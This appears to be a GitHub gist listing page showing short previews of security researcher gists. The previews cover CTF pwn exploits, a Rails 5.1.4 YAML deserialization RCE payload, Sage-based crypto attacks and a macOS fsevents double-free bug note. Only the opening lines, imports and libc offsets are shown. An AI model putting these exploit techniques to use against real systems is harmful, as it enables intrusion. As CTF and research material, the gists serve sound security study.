Niklas Baumstark niklasb
niklasb
/ gist:b5280bc856bfc94157b760eb962e7b60
Created
December 31, 2018 22:24
— forked from wmliang/gist:36b3e6a8d59875cc9f2b20a952bb8890
35c3ctf pwndb exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| #-*- coding: utf-8 -*- | |
| from pwn import * | |
| import re | |
| import sys | |
| import string | |
| import itertools | |
| # UAF in IndexCursor |
niklasb
/ railspwn.rb
Last active
March 7, 2021 12:14
Rails 5.1.4 YAML unsafe deserialization RCE payload
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'yaml' | |
| require 'base64' | |
| require 'erb' | |
| class ActiveSupport | |
| class Deprecation | |
| def initialize() | |
| @silenced = true | |
| end | |
| class DeprecatedInstanceVariableProxy |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from sage.all import continued_fraction, Integer, inverse_mod | |
| pubkey = (1696852658826990842058316561963467335977986730245296081842693913454799128341723605666024757923000936875008280288574503060506225324560725525210728761064310034604441130912702077320696660565727540525259413564999213382434231194132697630244074950529107794905761549606578049632101483460345878198682237227139704889943489709170676301481918176902970896183163611197618458670928730764124354693594769219086662173889094843054787693685403229558143793832013288487194871165461567L, 814161885590044357190593282132583612817366020133424034468187008267919006610450334193936389251944312061685926620628676079561886595567219325737685515818965422518820810326234612624290774570873983198113409686391355443155606621049101005048872030700143084978689888823664771959905075795440800042648923901406744546140059930315752131296763893979780940230041254506456283030727953969468933552050776243515721233426119581636614777596169466339421956338478341355508343072697451L, 17101222758731850777 |
niklasb
/ handicraft.py
Created
September 10, 2017 20:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from sage.all import * | |
| import base64 | |
| def factor(n,b): | |
| M=1 | |
| print 'start' | |
| a = 2 | |
| i=0 | |
| for q in primes(b): | |
| i+=1 |
niklasb
/ gracias.py
Last active
October 10, 2018 11:17
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from sage.all import continued_fraction, Integer, inverse_mod | |
| pubkey = (1696852658826990842058316561963467335977986730245296081842693913454799128341723605666024757923000936875008280288574503060506225324560725525210728761064310034604441130912702077320696660565727540525259413564999213382434231194132697630244074950529107794905761549606578049632101483460345878198682237227139704889943489709170676301481918176902970896183163611197618458670928730764124354693594769219086662173889094843054787693685403229558143793832013288487194871165461567L, 814161885590044357190593282132583612817366020133424034468187008267919006610450334193936389251944312061685926620628676079561886595567219325737685515818965422518820810326234612624290774570873983198113409686391355443155606621049101005048872030700143084978689888823664771959905075795440800042648923901406744546140059930315752131296763893979780940230041254506456283030727953969468933552050776243515721233426119581636614777596169466339421956338478341355508343072697451L, 17101222758731850777 |
niklasb
/ ctfzone_pwn.py
Created
July 18, 2017 15:56
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # First stage: unsafe unlink | |
| # Second stage (via a tunnel through a ROP chain): fastbin free pointer corruption | |
| from pwn import * | |
| import struct | |
| import sys | |
| offset_close = 0x00000000000f78b0 | |
| offset_env = 0x3c6f38 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Implementation based on attack from | |
| # http://www.hpl.hp.com/techreports/1999/HPL-1999-90.pdf | |
| import socket | |
| import telnetlib | |
| import random | |
| from hashlib import sha1 | |
| from sage.all import inverse_mod, matrix, vector | |
| TARGET = ('185.143.173.36', 1337) | |
| sock=socket.create_connection(TARGET) |
niklasb
/ gist:416b333cb973812b39c085a42f5c19c4
Last active
April 3, 2017 18:59
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| The `FSEVENTS_DEVICE_FILTER_64` command for the fsevents device's `ioctl` method has a race condition bug which can lead to double `free` when the user decides to update the number of devices to 0. | |
| static int | |
| fseventsf_ioctl(struct fileproc *fp, u_long cmd, caddr_t data, vfs_context_t ctx) | |
| { | |
| fsevent_handle *fseh = (struct fsevent_handle *)fp->f_fglob->fg_data; | |
| int ret = 0; | |
| fsevent_dev_filter_args64 *devfilt_args, _devfilt_args; | |
| OSAddAtomic(1, &fseh->active); |
niklasb
/ robot_pwnage.py
Last active
May 4, 2024 16:55
Exploit for 'wheel of robots' from insomni'hack 2017
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import time | |
| # https://github.com/niklasb/ctf-tools/blob/master/pwnlib/tools.py | |
| from pwnlib.tools import * | |
| TARGET=('localhost',5000) | |
| INTERVAL=0 | |
| offset_free = 549184 | |
| offset_system = 0x456d0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import telnetlib | |
| import time | |
| import struct | |
| import sys | |
| TARGET=('localhost', 1337) | |
| offset___libc_start_main_ret = 0x203f1 | |
| offset_system = 0x00000000000456d0 |
NewerOlder